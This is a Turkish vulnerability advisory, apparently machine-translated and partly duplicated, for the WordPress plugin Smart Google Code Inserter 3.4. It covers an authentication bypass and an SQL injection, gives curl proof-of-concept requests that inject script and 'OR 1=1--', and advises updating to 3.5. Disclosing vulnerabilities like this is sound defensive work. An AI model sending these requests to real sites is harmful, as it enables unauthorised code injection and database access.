1. Ürün ve Hizmet Tanıtımı:
================================
Smart Google Code Inserter, eklemeyi kolaylaştıran bir Wordpress eklentisidir
Google Analytics izleme kodu ve meta etiket doğrulaması
Webmaster araçları. Şu an itibariyle eklenti 34.207 kez indirildi ve
9.000'den fazla etkin yüklemeye sahip.
2. Teknik Detaylar ve Açıklama:
===================================
Smart Google Code Inserter'da Authentication Bypass güvenlik açığı
3.4 eklentisi, kimliği doğrulanmamış saldırganların rastgele javascript eklemesine izin verir
veya Wordpress tarafından sunulan tüm sayfalarda çalışan HTML kodu.
smartgooglecode.php'deki saveGoogleCode () işlevi,
mevcut talep yetkili bir kullanıcı tarafından yapıldığından, herhangi bir
kimliği doğrulanmamış kullanıcı, eklenen kodu başarıyla güncellemek için.
Kimlik Doğrulama Bypass ile birleştiğinde SQL Enjeksiyon güvenlik açığı
Smart Google Code Inserter eklentisi 3.4'teki güvenlik açığı,
kimliği doğrulanmamış saldırganlar, SQL sorgularını
Web sunucusu. Smartgooglecode.php'deki saveGoogleAdWords () işlevi
hazırlanmış ifadeler kullanın ve $ _POST ["oId"] değişkenini temizlemeyin
SQL sorgusuna girdi olarak geçirmeden önce.
3. Kavram Kanıtı (PoC):
==========================
SQL Injection
4. Etki Azaltma
=============
3.5 sürümüne güncelleyin
================================
Smart Google Code Inserter, eklemeyi kolaylaştıran bir Wordpress eklentisidir
Google Analytics izleme kodu ve meta etiket doğrulaması
Webmaster araçları. Şu an itibariyle eklenti 34.207 kez indirildi ve
9.000'den fazla etkin yüklemeye sahip.
2. Teknik Detaylar ve Açıklama:
===================================
Smart Google Code Inserter'da Authentication Bypass güvenlik açığı
3.4 eklentisi, kimliği doğrulanmamış saldırganların rastgele javascript eklemesine izin verir
veya Wordpress tarafından sunulan tüm sayfalarda çalışan HTML kodu.
smartgooglecode.php'deki saveGoogleCode () işlevi,
mevcut talep yetkili bir kullanıcı tarafından yapıldığından, herhangi bir
kimliği doğrulanmamış kullanıcı, eklenen kodu başarıyla güncellemek için.
Kimlik Doğrulama Bypass ile birleştiğinde SQL Enjeksiyon güvenlik açığı
Smart Google Code Inserter eklentisi 3.4'teki güvenlik açığı,
kimliği doğrulanmamış saldırganlar, SQL sorgularını
Web sunucusu. Smartgooglecode.php'deki saveGoogleAdWords () işlevi
hazırlanmış ifadeler kullanın ve $ _POST ["oId"] değişkenini temizlemeyin
SQL sorgusuna girdi olarak geçirmeden önce.
3. Kavram Kanıtı (PoC):
==========================
Kod:
curl -k -i --raw -X POST -d
"sgcgoogleanalytic=<script>alert("1");</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode"
"https://localhost/wp-admin/options-general.php?page=smartcode" -H "Host:
localhost" -H "Content-Type: application/x-www-form-urlencoded"SQL Injection
Kod:
curl -k -i --raw -X POST -d "action=saveadwords&delconf=1&oId[]=1 OR
1=1--&ppccap[]=ex:mywplead&ppcpageid[]=1&ppccode[]=bb&nchkdel1=on" "
https://localhost/wp-admin/options-general.php?page=smartcode" -H "Host:
localhost" -H "Content-Type: application/x-www-form-urlencoded"4. Etki Azaltma
=============
3.5 sürümüne güncelleyin
